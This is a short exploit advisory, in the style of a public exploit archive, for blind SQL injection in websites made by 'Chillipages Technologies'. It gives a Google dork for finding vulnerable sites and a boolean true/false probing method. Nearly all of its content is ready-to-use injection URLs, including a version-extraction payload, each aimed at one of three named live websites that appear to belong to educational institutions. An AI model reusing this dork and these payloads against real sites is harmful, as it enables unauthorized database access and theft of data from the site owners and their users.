*********************************************************
#Exploit Title: Chillipages Technologies - Blind Sql Injection
#Date: 2023-11-15
#Exploit Author: Behrouz Mansoori
#Google Dork: "Site by | Chillipages Technologies"
#Category:webapps
#Tested On: Mac, Firefox
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* https://www.fathermuller.edu.in/speech-hearing/event-display.php?id=512%20and%20true--
* https://www.fathermuller.edu.in/speech-hearing/event-display.php?id=512%20and%20false--
* https://www.fathermuller.edu.in/speech-hearing/event-display.php?id=512%20and%20/*!12345substring(@@version,1,1)*/=5--
### Demo 2:
* https://nsom.ac.in/news-details.php?id=490%20and%20true--
* https://nsom.ac.in/news-details.php?id=490%20and%20false--
* https://nsom.ac.in/news-details.php?id=490%20and%20/*!12345substring(@@version,1,1)*/=5--
### Demo 3:
* https://www.sjec.ac.in/faculty-display.php?id=191%20and%20true--
* https://www.sjec.ac.in/faculty-display.php?id=191%20and%20false--
* https://www.sjec.ac.in/faculty-display.php?id=191%20and%20/*!12345substring(@@version,1,1)*/=5--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************